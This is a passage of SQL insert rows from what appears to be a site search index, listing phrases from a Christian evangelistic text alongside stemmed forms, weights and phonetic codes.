(321017, 'in christ he', 'in christ he', 0, 1, 1.4, 'I52623', 1, '*'),
(321018, 'in due', 'in due', 0, 1, 1.2, 'I530', 1, '*'),
(321019, 'in due time', 'in due time', 0, 1, 1.3667, 'I535', 1, '*'),
(321020, 'in the son', 'in the son', 0, 1, 1.3333, 'I5325', 1, '*'),
(321021, 'in thine', 'in thine', 0, 1, 1.2667, 'I535', 1, '*'),
(321022, 'in thine heart', 'in thine heart', 0, 1, 1.4667, 'I53563', 1, '*'),
(321023, 'in your past', 'in your past', 0, 1, 1.4, 'I56123', 1, '*'),
(321024, 'institution', 'institut', 0, 0, 0.7333, 'I5235', 1, '*'),
(321025, 'institution he', 'institut he', 0, 1, 1.4667, 'I5235', 1, '*'),
(321026, 'institution he goes', 'institut he goes', 0, 1, 1.6333, 'I52352', 1, '*'),
(321027, 'into higher', 'into higher', 0, 1, 1.3667, 'I5326', 1, '*'),
(321028, 'into higher institution', 'into higher institution', 0, 1, 1.7667, 'I53265235', 1, '*'),
(321029, 'into your heart', 'into your heart', 0, 1, 1.5, 'I5363', 1, '*'),
(321030, 'introduction knowing', 'introduct knowing', 0, 1, 1.6667, 'I5363235252', 1, '*'),
(321031, 'introduction knowing whether', 'introduct knowing whether', 0, 1, 1.9333, 'I536323525236', 1, '*'),
(321032, 'involved the', 'involv the', 0, 1, 1.4, 'I51413', 1, '*'),
(321033, 'involved the young', 'involv the young', 0, 1, 1.6, 'I5141352', 1, '*'),
(321034, 'irrevocably', 'irrevoc', 0, 0, 0.7333, 'I61214', 1, '*'),
(321035, 'irrevocably committed', 'irrevoc committed', 0, 1, 1.7, 'I61214253', 1, '*'),
(321036, 'irrevocably committed to', 'irrevoc committed to', 0, 1, 1.8, 'I61214253', 1, '*'),
(321037, 'is a faithful', 'is a faithful', 0, 1, 1.4333, 'I21314', 1, '*'),
(321038, 'is a major', 'is a major', 0, 1, 1.3333, 'I2526', 1, '*'),
(321039, 'is a new', 'is a new', 0, 1, 1.2667, 'I250', 1, '*'),
(321040, 'is genuinely', 'is genuinely', 0, 1, 1.4, 'I254', 1, '*'),
(321041, 'is genuinely saved', 'is genuinely saved', 0, 1, 1.6, 'I254213', 1, '*'),
(321042, 'is made', 'is made', 0, 1, 1.2333, 'I253', 1, '*'),
(321043, 'is made unto', 'is made unto', 0, 1, 1.4, 'I25353', 1, '*'),
(321044, 'is my lord', 'is my lord', 0, 1, 1.3333, 'I25463', 1, '*'),
(321045, 'is one god', 'is one god', 0, 1, 1.3333, 'I2523', 1, '*'),
(321046, 'is saved', 'is saved', 0, 1, 1.2667, 'I213', 1, '*'),
(321047, 'is saved how', 'is saved how', 0, 1, 1.4, 'I213', 1, '*'),
(321048, 'is saved is', 'is saved is', 0, 1, 1.3667, 'I2132', 1, '*'),
(321049, 'is the lowest', 'is the lowest', 0, 1, 1.4333, 'I23423', 1, '*'),
(321050, 'isaiah 64', 'isaiah 64', 0, 1, 1.3, 'I200', 1, '*'),
(321051, 'isaiah 64 6a', 'isaiah 64 6a', 0, 1, 1.4, 'I200', 1, '*'),
(321052, 'issues of', 'issu of', 0, 1, 1.3, 'I210', 1, '*'),
(321053, 'issues of life', 'issu of life', 0, 1, 1.4667, 'I2141', 1, '*'),
(321054, 'it no', 'it no', 0, 1, 1.1667, 'I350', 1, '*'),
(321055, 'it no student', 'it no student', 0, 1, 1.4333, 'I352353', 1, '*'),
(321056, 'it out', 'it out', 0, 1, 1.2, 'I300', 1, '*'),
(321057, 'it out on', 'it out on', 0, 1, 1.3, 'I350', 1, '*'),
(321058, 'item 8', 'item 8', 0, 1, 1.2, 'I350', 1, '*'),
(321059, 'item 8 who', 'item 8 who', 0, 1, 1.3333, 'I350', 1, '*'),
(321060, 'jesus and his', 'jesu and his', 0, 1, 1.4333, 'J532', 1, '*'),
(321061, 'jesus and shalt', 'jesu and shalt', 0, 1, 1.5, 'J53243', 1, '*'),
(321062, 'jesus as my', 'jesu as my', 0, 1, 1.3667, 'J500', 1, '*'),
(321063, 'jesus being', 'jesu being', 0, 1, 1.3667, 'J152', 1, '*'),
(321064, 'jesus being the', 'jesu being the', 0, 1, 1.5, 'J1523', 1, '*'),
(321065, 'jesus came into', 'jesu came into', 0, 1, 1.5, 'J530', 1, '*'),
(321066, 'jesus can', 'jesu can', 0, 1, 1.3, 'J500', 1, '*'),
(321067, 'jesus can be', 'jesu can be', 0, 1, 1.4, 'J510', 1, '*'),
(321068, 'jesus did', 'jesu did', 0, 1, 1.3, 'J300', 1, '*'),
(321069, 'jesus did on', 'jesu did on', 0, 1, 1.4, 'J350', 1, '*'),
(321070, 'jesus died', 'jesu died', 0, 1, 1.3333, 'J300', 1, '*'),
(321071, 'jesus died for', 'jesu died for', 0, 1, 1.4667, 'J316', 1, '*'),
(321072, 'jesus i', 'jesu i', 0, 1, 1.2333, 'J000', 1, '*'),
(321073, 'jesus i know', 'jesu i know', 0, 1, 1.4, 'J500', 1, '*'),
(321074, 'jesus is my', 'jesu is my', 0, 1, 1.3667, 'J500', 1, '*'),
(321075, 'jesus name amen', 'jesu name amen', 0, 1, 1.5, 'J500', 1, '*'),
(321076, 'jesus rom', 'jesu rom', 0, 1, 1.3, 'J650', 1, '*'),
(321077, 'jesus rom 10', 'jesu rom 10', 0, 1, 1.4, 'J650', 1, '*'),
(321078, 'jesus to be', 'jesu to be', 0, 1, 1.3667, 'J310', 2, '*'),
(321079, 'jesus who', 'jesu who', 0, 1, 1.3, 'J000', 1, '*'),
(321080, 'jesus who gave', 'jesu who gave', 0, 1, 1.4667, 'J100', 1, '*'),
(321081, 'jesus “therefore', 'jesu “therefore', 0, 1, 1.5333, 'J3616', 1, '*'),
(321082, 'jesus “therefore if', 'jesu “therefore if', 0, 1, 1.6333, 'J36161', 1, '*'),
(321083, 'john 9 35-38', 'john 9 35-38', 0, 1, 1.4, 'J500', 1, '*'),
(321084, 'joined', 'join', 0, 0, 0.4, 'J530', 1, '*'),
(321085, 'joined a', 'join a', 0, 1, 1.2667, 'J530', 1, '*'),
(321086, 'joined a born', 'join a born', 0, 1, 1.4333, 'J53165', 1, '*'),
(321087, 'just joined', 'just joined', 0, 1, 1.3667, 'J3253', 1, '*'),
(321088, 'just joined a', 'just joined a', 0, 1, 1.4333, 'J3253', 1, '*'),
(321089, 'just made', 'just made', 0, 1, 1.3, 'J353', 1, '*'),
(321090, 'just made several', 'just made several', 0, 1, 1.5667, 'J3532164', 1, '*'),
(321091, 'k2 item 8', 'k2 item 8', 0, 1, 1.3, 'K350', 1, '*'),
(321092, 'know that i\'m', 'know that i', 0, 1, 1.4333, 'K535', 1, '*'),
(321093, 'knowing whether', 'know whether', 0, 1, 1.5, 'K5236', 1, '*'),
(321094, 'knowing whether one', 'know whether one', 0, 1, 1.6333, 'K52365', 1, '*'),
(321095, 'knowledge and when', 'knowledg and when', 0, 1, 1.6, 'K5432535', 1, '*'),
(321096, 'leaf do', 'leaf do', 0, 1, 1.2333, 'L130', 1, '*'),
(321097, 'leaf do you', 'leaf do you', 0, 1, 1.3667, 'L130', 1, '*'),
(321098, 'learned', 'learn', 0, 0, 0.4667, 'L653', 1, '*'),
(321099, 'learned and', 'learn and', 0, 1, 1.3667, 'L65353', 1, '*'),
(321100, 'learned and illiterate', 'learn and illiterate', 0, 1, 1.7333, 'L653534363', 1, '*'),
(321101, 'let me take', 'let me take', 0, 1, 1.3667, 'L3532', 1, '*'),
(321102, 'let\'s make', 'let make', 0, 1, 1.3333, 'L3252', 1, '*'),
(321103, 'let\'s make sure', 'let make sure', 0, 1, 1.5, 'L32526', 1, '*'),
(321104, 'life am', 'life am', 0, 1, 1.2333, 'L150', 1, '*'),
(321105, 'life am i', 'life am i', 0, 1, 1.3, 'L150', 1, '*'),
(321106, 'life and attitude', 'life and attitude', 0, 1, 1.5667, 'L153', 1, '*'),
(321107, 'life you don\'t', 'life you don', 0, 1, 1.4667, 'L1353', 1, '*'),
(321108, 'life “what', 'life “what', 0, 1, 1.3333, 'L130', 1, '*'),
(321109, 'life “what will', 'life “what will', 0, 1, 1.5, 'L134', 1, '*'),
(321110, 'list you', 'list you', 0, 1, 1.2667, 'L230', 1, '*'),
(321111, 'list you cannot', 'list you cannot', 0, 1, 1.5, 'L23253', 1, '*'),
(321112, 'lord act', 'lord act', 0, 1, 1.2667, 'L6323', 1, '*'),
(321113, 'lord act 3', 'lord act 3', 0, 1, 1.3333, 'L6323', 1, '*'),
(321114, 'lord acts', 'lord acts', 0, 1, 1.3, 'L63232', 1, '*'),
(321115, 'lord acts 9', 'lord acts 9', 0, 1, 1.3667, 'L63232', 1, '*'),
(321116, 'lord father', 'lord father', 0, 1, 1.3667, 'L63136', 1, '*'),
(321117, 'lord father i', 'lord father i', 0, 1, 1.4333, 'L63136', 1, '*'),
(321118, 'lord jesus and', 'lord jesus and', 0, 1, 1.4667, 'L63253', 1, '*'),
(321119, 'lot of born', 'lot of born', 0, 1, 1.3667, 'L3165', 1, '*'),
(321120, 'lowest form', 'lowest form', 0, 1, 1.3667, 'L23165', 1, '*'),
(321121, 'lowest form of', 'lowest form of', 0, 1, 1.4667, 'L231651', 1, '*'),
(321122, 'made several', 'made several', 0, 1, 1.4, 'M32164', 1, '*'),
(321123, 'made several good', 'made several good', 0, 1, 1.5667, 'M3216423', 1, '*'),
(321124, 'made unto', 'made unto', 0, 1, 1.3, 'M353', 1, '*'),
(321125, 'made unto salvation.”', 'made unto salvation.”', 0, 1, 1.7, 'M35324135', 1, '*'),
(321126, 'major question', 'major question', 0, 1, 1.4667, 'M26235', 1, '*'),
(321127, 'major question everyone', 'major question everyone', 0, 1, 1.7667, 'M26235165', 1, '*'),
(321128, 'make a spiritual', 'make a spiritual', 0, 1, 1.5333, 'M21634', 1, '*'),
(321129, 'make me', 'make me', 0, 1, 1.2333, 'M250', 1, '*'),
(321130, 'make me whole', 'make me whole', 0, 1, 1.4333, 'M254', 1, '*'),
(321131, 'make sure let', 'make sure let', 0, 1, 1.4333, 'M2643', 1, '*'),
(321132, 'make sure my', 'make sure my', 0, 1, 1.4, 'M265', 1, '*'),
(321133, 'male', 'male', 0, 0, 0.2667, 'M400', 1, '*'),
(321134, 'male and', 'male and', 0, 1, 1.2667, 'M453', 1, '*'),
(321135, 'male and female', 'male and female', 0, 1, 1.5, 'M453154', 1, '*'),
(321136, 'man be', 'man be', 0, 1, 1.2, 'M100', 1, '*'),
(321137, 'man be in', 'man be in', 0, 1, 1.3, 'M150', 1, '*'),
(321138, 'man believeth', 'man believeth', 0, 1, 1.4333, 'M1413', 1, '*'),
(321139, 'man believeth unto', 'man believeth unto', 0, 1, 1.6, 'M141353', 1, '*'),
(321140, 'man can answer', 'man can answer', 0, 1, 1.4667, 'M2526', 1, '*'),
(321141, 'man christ', 'man christ', 0, 1, 1.3333, 'M2623', 1, '*'),
(321142, 'man christ jesus', 'man christ jesus', 0, 1, 1.5333, 'M26232', 1, '*'),
(321143, 'many good', 'mani good', 0, 1, 1.3, 'M230', 1, '*'),
(321144, 'many good works', 'mani good works', 0, 1, 1.5, 'M2362', 1, '*'),
(321145, 'many in', 'mani in', 0, 1, 1.2333, 'M000', 1, '*'),
(321146, 'many in your', 'mani in your', 0, 1, 1.4, 'M600', 1, '*'),
(321147, 'me all', 'me all', 0, 1, 1.2, 'M400', 1, '*'),
(321148, 'me all my', 'me all my', 0, 1, 1.3, 'M450', 1, '*'),
(321149, 'me he', 'me he', 0, 1, 1.1667, 'M000', 1, '*'),
(321150, 'me he shed', 'me he shed', 0, 1, 1.3333, 'M230', 1, '*'),
(321151, 'me take', 'me take', 0, 1, 1.2333, 'M320', 1, '*'),
(321152, 'me take you', 'me take you', 0, 1, 1.3667, 'M320', 1, '*'),
(321153, 'me whole', 'me whole', 0, 1, 1.2667, 'M400', 1, '*'),
(321154, 'me whole i', 'me whole i', 0, 1, 1.3333, 'M400', 1, '*'),
(321155, 'me with', 'me with', 0, 1, 1.2333, 'M300', 1, '*'),
(321156, 'me with your', 'me with your', 0, 1, 1.4, 'M360', 1, '*'),
(321157, 'mediator', 'mediat', 0, 0, 0.5333, 'M360', 1, '*'),
(321158, 'mediator between', 'mediat between', 0, 1, 1.5333, 'M36135', 1, '*'),
(321159, 'mediator between god', 'mediat between god', 0, 1, 1.6667, 'M3613523', 1, '*'),
(321160, 'men of god', 'men of god', 0, 1, 1.3333, 'M123', 1, '*'),
(321161, 'men the', 'men the', 0, 1, 1.2333, 'M300', 1, '*'),
(321162, 'men the man', 'men the man', 0, 1, 1.3667, 'M350', 1, '*'),
(321163, 'might be saved', 'might be saved', 0, 1, 1.4667, 'M231213', 1, '*'),
(321164, 'money to', 'monei to', 0, 1, 1.2667, 'M300', 2, '*'),
(321165, 'money to churches', 'monei to churches', 0, 1, 1.5667, 'M3262', 1, '*'),
(321166, 'mouth confession', 'mouth confession', 0, 1, 1.5333, 'M325125', 1, '*'),
(321167, 'mouth confession is', 'mouth confession is', 0, 1, 1.6333, 'M3251252', 1, '*'),
(321168, 'mouth that', 'mouth that', 0, 1, 1.3333, 'M300', 1, '*'),
(321169, 'mouth that jesus', 'mouth that jesus', 0, 1, 1.5333, 'M320', 1, '*'),
(321170, 'mouth the', 'mouth the', 0, 1, 1.3, 'M300', 1, '*'),
(321171, 'mouth the lord', 'mouth the lord', 0, 1, 1.4667, 'M3463', 1, '*'),
(321172, 'much as', 'much as', 0, 1, 1.2333, 'M200', 1, '*'),
(321173, 'much as the', 'much as the', 0, 1, 1.3667, 'M230', 1, '*'),
(321174, 'my friend', 'my friend', 0, 1, 1.3, 'M1653', 1, '*'),
(321175, 'my friend assumption', 'my friend assumption', 0, 1, 1.6667, 'M165325135', 1, '*'),
(321176, 'my heart', 'my heart', 0, 1, 1.2667, 'M630', 1, '*'),
(321177, 'my heart and', 'my heart and', 0, 1, 1.4, 'M6353', 1, '*'),
(321178, 'my lord', 'my lord', 0, 1, 1.2333, 'M463', 1, '*'),
(321179, 'my lord father', 'my lord father', 0, 1, 1.4667, 'M463136', 1, '*'),
(321180, 'my mouth', 'my mouth', 0, 1, 1.2667, 'M300', 1, '*'),
(321181, 'my mouth that', 'my mouth that', 0, 1, 1.4333, 'M300', 1, '*'),
(321182, 'my personal', 'my personal', 0, 1, 1.3667, 'M16254', 1, '*'),
(321183, 'my personal lord', 'my personal lord', 0, 1, 1.5333, 'M1625463', 1, '*'),
(321184, 'my sins', 'my sins', 0, 1, 1.2333, 'M252', 1, '*'),
(321185, 'my sins wash', 'my sins wash', 0, 1, 1.4, 'M252', 1, '*'),
(321186, 'myself', 'myself', 0, 0, 0.4, 'M241', 1, '*'),
(321187, 'myself but', 'myself but', 0, 1, 1.3333, 'M2413', 1, '*'),
(321188, 'myself but jesus', 'myself but jesus', 0, 1, 1.5333, 'M24132', 1, '*'),
(321189, 'need of a', 'need of a', 0, 1, 1.3, 'N310', 1, '*'),
(321190, 'needs to answer', 'need to answer', 0, 1, 1.5, 'N323526', 1, '*'),
(321191, 'new creature old', 'new creature old', 0, 1, 1.5333, 'N263643', 1, '*'),
(321192, 'new leaf', 'new leaf', 0, 1, 1.2667, 'N410', 1, '*'),
(321193, 'new leaf do', 'new leaf do', 0, 1, 1.3667, 'N413', 1, '*'),
(321194, 'new.”', 'new.”', 0, 0, 0.3333, 'N000', 1, '*'),
(321195, 'new.” ii', 'new.” ii', 0, 1, 1.2667, 'N000', 1, '*'),
(321196, 'new.” ii cor', 'new.” ii cor', 0, 1, 1.4, 'N260', 1, '*'),
(321197, 'news of', 'new of', 0, 1, 1.2333, 'N210', 1, '*'),
(321198, 'news of what', 'new of what', 0, 1, 1.4, 'N213', 1, '*'),
(321199, 'no only', 'no only', 0, 1, 1.2333, 'N400', 1, '*'),
(321200, 'no only jesus', 'no only jesus', 0, 1, 1.4333, 'N420', 1, '*'),
(321201, 'no other', 'no other', 0, 1, 1.2667, 'N360', 1, '*'),
(321202, 'no other man', 'no other man', 0, 1, 1.4, 'N365', 1, '*'),
(321203, 'no personal', 'no personal', 0, 1, 1.3667, 'N16254', 1, '*'),
(321204, 'no personal relationship', 'no personal relationship', 0, 1, 1.8, 'N16254643521', 1, '*'),
(321205, 'no student', 'no student', 0, 1, 1.3333, 'N2353', 1, '*'),
(321206, 'no student assumes', 'no student assumes', 0, 1, 1.6, 'N2353252', 1, '*'),
(321207, 'no woman', 'no woman', 0, 1, 1.2667, 'N000', 1, '*'),
(321208, 'no woman assumes', 'no woman assumes', 0, 1, 1.5333, 'N252', 1, '*'),
(321209, 'not confer', 'not confer', 0, 1, 1.3333, 'N32516', 1, '*'),
(321210, 'not confer salvation', 'not confer salvation', 0, 1, 1.6667, 'N3251624135', 1, '*'),
(321211, 'not to harm', 'not to harm', 0, 1, 1.3667, 'N365', 1, '*'),
(321212, 'now pray', 'now pray', 0, 1, 1.2667, 'N160', 1, '*'),
(321213, 'now pray this', 'now pray this', 0, 1, 1.4333, 'N1632', 1, '*'),
(321214, 'of a changed', 'of a changed', 0, 1, 1.4, 'O12523', 1, '*'),
(321215, 'of all acceptation', 'of all acceptation', 0, 1, 1.6, 'O142135', 1, '*'),
(321216, 'of born', 'of born', 0, 1, 1.2333, 'O165', 1, '*'),
(321217, 'of born again', 'of born again', 0, 1, 1.4333, 'O16525', 1, '*'),
(321218, 'of god about', 'of god about', 0, 1, 1.4, 'O12313', 1, '*'),
(321219, 'of god john', 'of god john', 0, 1, 1.3667, 'O12325', 1, '*'),
(321220, 'of god\'s glory', 'of god glory', 0, 1, 1.4667, 'O123246', 1, '*'),
(321221, 'of god”', 'of god”', 0, 1, 1.2333, 'O123', 1, '*'),
(321222, 'of god” rom', 'of god” rom', 0, 1, 1.3667, 'O12365', 1, '*'),
(321223, 'of jesus i', 'of jesus i', 0, 1, 1.3333, 'O120', 1, '*'),
(321224, 'of jesus “therefore', 'of jesus “therefore', 0, 1, 1.6333, 'O123616', 1, '*'),
(321225, 'of life am', 'of life am', 0, 1, 1.3333, 'O1415', 1, '*'),
(321226, 'of life “what', 'of life “what', 0, 1, 1.4333, 'O1413', 1, '*'),
(321227, 'of many good', 'of many good', 0, 1, 1.4, 'O1523', 1, '*'),
(321228, 'of one or', 'of one or', 0, 1, 1.3, 'O156', 1, '*'),
(321229, 'of the glory', 'of the glory', 0, 1, 1.4, 'O13246', 1, '*'),
(321230, 'of the questions', 'of the questions', 0, 1, 1.5333, 'O132352', 1, '*'),
(321231, 'of the whole', 'of the whole', 0, 1, 1.4, 'O134', 1, '*'),
(321232, 'of what jesus', 'of what jesus', 0, 1, 1.4333, 'O132', 1, '*'),
(321233, 'of whom', 'of whom', 0, 1, 1.2333, 'O150', 1, '*'),
(321234, 'of whom i', 'of whom i', 0, 1, 1.3, 'O150', 1, '*'),
(321235, 'of your personalsin', 'of your personalsin', 0, 1, 1.6333, 'O161625425', 1, '*'),
(321236, 'old things', 'old things', 0, 1, 1.3333, 'O4352', 1, '*'),
(321237, 'old things are', 'old things are', 0, 1, 1.4667, 'O43526', 1, '*'),
(321238, 'on anyone', 'on anyone', 0, 1, 1.3, 'O500', 1, '*'),
(321239, 'on anyone have', 'on anyone have', 0, 1, 1.4667, 'O510', 1, '*'),
(321240, 'on assumption', 'on assumption', 0, 1, 1.4333, 'O525135', 1, '*'),
(321241, 'on assumption but', 'on assumption but', 0, 1, 1.5667, 'O52513513', 1, '*'),
(321242, 'on their list', 'on their list', 0, 1, 1.4333, 'O536423', 1, '*'),
(321243, 'on this earth', 'on this earth', 0, 1, 1.4333, 'O53263', 1, '*'),
(321244, 'on time this', 'on time this', 0, 1, 1.4, 'O53532', 1, '*'),
(321245, 'on your repentance', 'on your repentance', 0, 1, 1.6, 'O5615352', 1, '*'),
(321246, 'one god', 'on god', 0, 1, 1.2333, 'O523', 1, '*'),
(321247, 'one god and', 'on god and', 0, 1, 1.3667, 'O52353', 1, '*'),
(321248, 'one is', 'on is', 0, 1, 1.2, 'O520', 1, '*'),
(321249, 'one is saved', 'on is saved', 0, 1, 1.4, 'O5213', 1, '*'),
(321250, 'one mediator', 'on mediator', 0, 1, 1.4, 'O536', 1, '*'),
(321251, 'one mediator between', 'on mediator between', 0, 1, 1.6667, 'O536135', 1, '*'),
(321252, 'only jesus', 'onli jesus', 0, 1, 1.3333, 'O542', 1, '*'),
(321253, 'only jesus can', 'onli jesus can', 0, 1, 1.4667, 'O5425', 1, '*'),
(321254, 'or self', 'or self', 0, 1, 1.2333, 'O6241', 1, '*'),
(321255, 'or self torture', 'or self torture', 0, 1, 1.5, 'O62413636', 1, '*'),
(321256, 'or two religious', 'or two religious', 0, 1, 1.5333, 'O63642', 1, '*'),
(321257, 'other man', 'other man', 0, 1, 1.3, 'O365', 1, '*'),
(321258, 'other man can', 'other man can', 0, 1, 1.4333, 'O36525', 1, '*'),
(321259, 'our righteousness', 'our righteousness', 0, 1, 1.5667, 'O623252', 1, '*'),
(321260, 'our righteousness are', 'our righteousness are', 0, 1, 1.7, 'O6232526', 1, '*'),
(321261, 'out on', 'out on', 0, 1, 1.2, 'O350', 1, '*'),
(321262, 'out on their', 'out on their', 0, 1, 1.4, 'O3536', 1, '*'),
(321263, 'passed away', 'pass away', 0, 1, 1.3667, 'P230', 1, '*'),
(321264, 'passed away behold', 'pass away behold', 0, 1, 1.6, 'P23143', 1, '*'),
(321265, 'past beloved', 'past beloved', 0, 1, 1.4, 'P231413', 1, '*'),
(321266, 'past beloved answering', 'past beloved answering', 0, 1, 1.7333, 'P23141352652', 1, '*'),
(321267, 'penance', 'penanc', 0, 0, 0.4667, 'P520', 1, '*'),
(321268, 'penance or', 'penanc or', 0, 1, 1.3333, 'P526', 1, '*'),
(321269, 'penance or self', 'penanc or self', 0, 1, 1.5, 'P526241', 1, '*'),
(321270, 'people of', 'peopl of', 0, 1, 1.3, 'P410', 2, '*'),
(321271, 'people of god', 'peopl of god', 0, 1, 1.4333, 'P4123', 2, '*'),
(321272, 'people turn', 'peopl turn', 0, 1, 1.3667, 'P4365', 1, '*'),
(321273, 'people turn to', 'peopl turn to', 0, 1, 1.4667, 'P43653', 1, '*'),
(321274, 'person involved', 'person involved', 0, 1, 1.5, 'P6251413', 1, '*'),
(321275, 'person involved the', 'person involved the', 0, 1, 1.6333, 'P6251413', 1, '*'),
(321276, 'personal lord', 'person lord', 0, 1, 1.4333, 'P625463', 1, '*'),
(321277, 'personal lord and', 'person lord and', 0, 1, 1.5667, 'P62546353', 1, '*'),
(321278, 'personal saviour', 'person saviour', 0, 1, 1.5333, 'P6254216', 1, '*'),
(321279, 'personal saviour believe', 'person saviour believe', 0, 1, 1.8, 'P6254216141', 1, '*'),
(321280, 'personal saviour from', 'person saviour from', 0, 1, 1.7, 'P6254216165', 1, '*'),
(321281, 'personal saviour no', 'person saviour no', 0, 1, 1.6333, 'P62542165', 1, '*'),
(321282, 'personalsin', 'personalsin', 0, 0, 0.7333, 'P625425', 1, '*'),
(321283, 'personalsin realize', 'personalsin realize', 0, 1, 1.6333, 'P625425642', 1, '*'),
(321284, 'personalsin realize your', 'personalsin realize your', 0, 1, 1.8, 'P6254256426', 1, '*'),
(321285, 'practices you', 'practic you', 0, 1, 1.4333, 'P6232', 1, '*'),
(321286, 'practices you do', 'practic you do', 0, 1, 1.5333, 'P62323', 1, '*'),
(321287, 'pray this', 'prai this', 0, 1, 1.3, 'P632', 1, '*'),
(321288, 'pray this prayer', 'prai this prayer', 0, 1, 1.5333, 'P63216', 1, '*'),
(321289, 'prayer father', 'prayer father', 0, 1, 1.4333, 'P6136', 1, '*'),
(321290, 'prayer father i', 'prayer father i', 0, 1, 1.5, 'P6136', 1, '*'),
(321291, 'preaching', 'preach', 0, 0, 0.6, 'P6252', 1, '*'),
(321292, 'preaching of', 'preach of', 0, 1, 1.4, 'P62521', 1, '*'),
(321293, 'preaching of the', 'preach of the', 0, 1, 1.5333, 'P625213', 1, '*'),
(321294, 'pregnant she', 'pregnant she', 0, 1, 1.4, 'P62532', 1, '*'),
(321295, 'pregnant she goes', 'pregnant she goes', 0, 1, 1.5667, 'P62532', 1, '*'),
(321296, 'presently', 'present', 0, 0, 0.6, 'P62534', 1, '*'),
(321297, 'presently and', 'present and', 0, 1, 1.4333, 'P6253453', 1, '*'),
(321298, 'presently and many', 'present and many', 0, 1, 1.6, 'P62534535', 1, '*'),
(321299, 'projects', 'project', 0, 0, 0.5333, 'P6232', 1, '*'),
(321300, 'projects are', 'project are', 0, 1, 1.4, 'P62326', 1, '*'),
(321301, 'projects are you', 'project are you', 0, 1, 1.5333, 'P62326', 1, '*'),
(321302, 'proves', 'prove', 0, 0, 0.4, 'P612', 1, '*'),
(321303, 'proves it', 'prove it', 0, 1, 1.3, 'P6123', 1, '*'),
(321304, 'proves it no', 'prove it no', 0, 1, 1.4, 'P61235', 1, '*'),
(321305, 'question everyone', 'question everyone', 0, 1, 1.5667, 'Q35165', 1, '*'),
(321306, 'question everyone needs', 'question everyone needs', 0, 1, 1.7667, 'Q3516532', 1, '*'),
(321307, 'question of', 'question of', 0, 1, 1.3667, 'Q351', 1, '*'),
(321308, 'question of life', 'question of life', 0, 1, 1.5333, 'Q35141', 1, '*'),
(321309, 'questions that no', 'question that no', 0, 1, 1.5667, 'Q35235', 1, '*'),
(321310, 'questions that shows', 'question that shows', 0, 1, 1.6667, 'Q35232', 1, '*'),
(321311, 'rags', 'rag', 0, 0, 0.2667, 'R200', 1, '*'),
(321312, 'rags the', 'rag the', 0, 1, 1.2667, 'R230', 1, '*'),
(321313, 'rags the bible', 'rag the bible', 0, 1, 1.4667, 'R2314', 1, '*'),
(321314, 'raised him', 'rais him', 0, 1, 1.3333, 'R235', 2, '*'),
(321315, 'raised him from', 'rais him from', 0, 1, 1.5, 'R235165', 1, '*'),
(321316, 'ransom', 'ransom', 0, 0, 0.4, 'R525', 1, '*'),
(321317, 'ransom for', 'ransom for', 0, 1, 1.3333, 'R52516', 1, '*'),
(321318, 'ransom for all', 'ransom for all', 0, 1, 1.4667, 'R525164', 1, '*'),
(321319, 'reality no', 'realiti no', 0, 1, 1.3333, 'R435', 1, '*'),
(321320, 'reality no woman', 'realiti no woman', 0, 1, 1.5333, 'R435', 1, '*'),
(321321, 'realize that you', 'realiz that you', 0, 1, 1.5333, 'R423', 1, '*'),
(321322, 'realize through', 'realiz through', 0, 1, 1.5, 'R42362', 1, '*'),
(321323, 'realize through the', 'realiz through the', 0, 1, 1.6333, 'R423623', 1, '*'),
(321324, 'realize your', 'realiz your', 0, 1, 1.4, 'R426', 1, '*'),
(321325, 'realize your need', 'realiz your need', 0, 1, 1.5667, 'R42653', 1, '*'),
(321326, 'receive the gospel', 'receiv the gospel', 0, 1, 1.6, 'R213214', 1, '*'),
(321327, 'relationship with him', 'relationship with him', 0, 1, 1.7, 'R4352135', 1, '*'),
(321328, 'religious practices', 'religi practices', 0, 1, 1.6333, 'R4216232', 1, '*'),
(321329, 'religious practices you', 'religi practices you', 0, 1, 1.7667, 'R4216232', 1, '*'),
(321330, 'repentance and', 'repent and', 0, 1, 1.4667, 'R1535253', 1, '*'),
(321331, 'repentance and acceptance', 'repent and acceptance', 0, 1, 1.8333, 'R153525321352', 1, '*'),
(321332, 'report', 'report', 0, 0, 0.4, 'R163', 1, '*'),
(321333, 'report of', 'report of', 0, 1, 1.3, 'R1631', 1, '*'),
(321334, 'report of god', 'report of god', 0, 1, 1.4333, 'R163123', 1, '*'),
(321335, 'resolutions', 'resolut', 0, 0, 0.7333, 'R24352', 1, '*'),
(321336, 'resolutions to', 'resolut to', 0, 1, 1.4667, 'R243523', 1, '*'),
(321337, 'resolutions to turn', 'resolut to turn', 0, 1, 1.6333, 'R24352365', 1, '*'),
(321338, 'righteousness and', 'righteous and', 0, 1, 1.5667, 'R2325253', 1, '*'),
(321339, 'righteousness and with', 'righteous and with', 0, 1, 1.7333, 'R2325253', 1, '*'),
(321340, 'righteousness are', 'righteous are', 0, 1, 1.5667, 'R232526', 1, '*'),
(321341, 'righteousness are as', 'righteous are as', 0, 1, 1.6667, 'R2325262', 1, '*'),
(321342, 'rom', 'rom', 0, 0, 0.2, 'R500', 1, '*'),
(321343, 'rom 10', 'rom 10', 0, 1, 1.2, 'R500', 1, '*'),
(321344, 'rom 10 9-10', 'rom 10 9-10', 0, 1, 1.3667, 'R500', 1, '*'),
(321345, 'rom 3', 'rom 3', 0, 1, 1.1667, 'R500', 1, '*'),
(321346, 'rom 3 23', 'rom 3 23', 0, 1, 1.2667, 'R500', 1, '*'),
(321347, 'said about', 'said about', 0, 1, 1.3333, 'S313', 1, '*'),
(321348, 'said about jesus', 'said about jesus', 0, 1, 1.5333, 'S3132', 1, '*'),
(321349, 'salvation on', 'salvat on', 0, 1, 1.4, 'S4135', 1, '*'),
(321350, 'salvation on anyone', 'salvat on anyone', 0, 1, 1.6333, 'S4135', 1, '*'),
(321351, 'salvation.”', 'salvation.”', 0, 0, 0.7333, 'S4135', 1, '*'),
(321352, 'salvation.” have', 'salvation.” have', 0, 1, 1.5333, 'S41351', 1, '*'),
(321353, 'salvation.” have a', 'salvation.” have a', 0, 1, 1.6, 'S41351', 1, '*'),
(321354, 'save myself', 'save myself', 0, 1, 1.3667, 'S15241', 1, '*'),
(321355, 'save myself but', 'save myself but', 0, 1, 1.5, 'S152413', 1, '*'),
(321356, 'save sinners', 'save sinners', 0, 1, 1.4, 'S12562', 1, '*'),
(321357, 'save sinners of', 'save sinners of', 0, 1, 1.5, 'S125621', 1, '*'),
(321358, 'save you', 'save you', 0, 1, 1.2667, 'S100', 1, '*'),
(321359, 'save you isaiah', 'save you isaiah', 0, 1, 1.5, 'S120', 1, '*'),
(321360, 'saved because', 'save because', 0, 1, 1.4333, 'S1312', 1, '*'),
